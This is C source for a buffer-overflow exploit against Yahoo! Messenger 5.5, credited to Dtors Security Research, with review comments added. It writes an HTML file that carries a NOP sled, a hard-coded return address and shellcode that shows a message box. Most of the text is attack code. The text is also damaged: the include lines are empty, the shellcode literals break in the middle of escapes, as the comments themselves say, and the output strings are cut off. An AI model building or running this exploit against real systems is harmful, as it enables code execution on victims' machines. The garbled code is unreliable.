#include
#include
#include
/*
 * Four raw bytes, written as a string literal so that they can be spliced
 * into win32_msgbox below by adjacent-literal concatenation.
 * NOTE(review): the macro name suggests a hard-coded absolute address of the
 * MessageBoxA API; nothing in this file confirms that. A fixed value of this
 * kind would only be valid for one particular OS / DLL build.
 */
#define MessageBoxA "\x1d\x97\x53\x01"
/*
 * Four initialised bytes in an 8-byte array (the remaining elements are
 * zero). main() copies exactly 4 bytes of this to buffer+offset.
 * NOTE(review): presumably the value meant to replace a saved return
 * address, judging by the name -- confirm against the advisory. It is a
 * fixed constant, so it depends on one specific process memory layout.
 */
char ret[8]= "\xD5\x96\x7A\x01";
/*
 * Payload byte array, assembled from adjacent string literals with the
 * MessageBoxA macro bytes inserted in the first line.
 * main() measures this array with strlen(), so only the bytes before the
 * first \x00 are counted and copied; the trailing \x00 run is not.
 * NOTE(review): the literals below are split in the middle of a "\x" escape
 * and start with a space inside the quotes. This looks like damage from
 * page extraction; as shown here the initialiser does not compile.
 */
unsigned char win32_msgbox[] = {
"\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
" \x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\x
E2\xFF\xFF\xFF"
" \x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
};
int main(int argc,char *argv[])
{
FILE *evil;
char *shellcode = win32_msgbox;
unsigned char buffer[5000];
int offset=320;
fprintf(stdout, "\n\tYahPoo.c By bob.\n");
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
fprintf(stdout, "\tDSR-[http://www.dtors.net/]-DSR\n\n");
fprintf(stdout,"Makin' da EbUL HTML File... ");
if ((evil =fopen("yahoo.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Opened!\n");
}
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
memcpy(buffer+offset,ret,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode
));
buffer[264] = 0xD4; //address of &shellcode
buffer[265] = 0x96;
buffer[266] = 0x7A;
buffer[267] = 0x01;
buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
buffer[273] = 0x01;
buffer[274] = 0x01;
buffer[275] = 0x78;
fprintf(evil,"");
fprintf(evil,"\n");
fprintf(evil,"Dtors Security Research (DSR)\n");
fprintf(evil,"
Yahoo Messenger 5.5 exploit....
\n");
fprintf(evil,"
");